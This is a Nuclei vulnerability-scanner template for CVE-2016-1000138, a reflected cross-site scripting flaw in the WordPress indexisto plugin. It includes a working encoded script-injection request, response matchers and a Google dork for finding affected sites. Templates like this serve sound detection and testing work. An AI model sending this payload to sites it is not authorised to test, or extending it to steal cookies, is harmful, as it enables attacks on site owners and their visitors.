nuclei-templates/cves/2016/CVE-2016-1000138.yaml

44 lines
1.5 KiB
YAML

id: CVE-2016-1000138
info:
name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=38
- https://wordpress.org/plugins/indexisto
- http://web.archive.org/web/20210622181116/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000138
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/indexisto"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12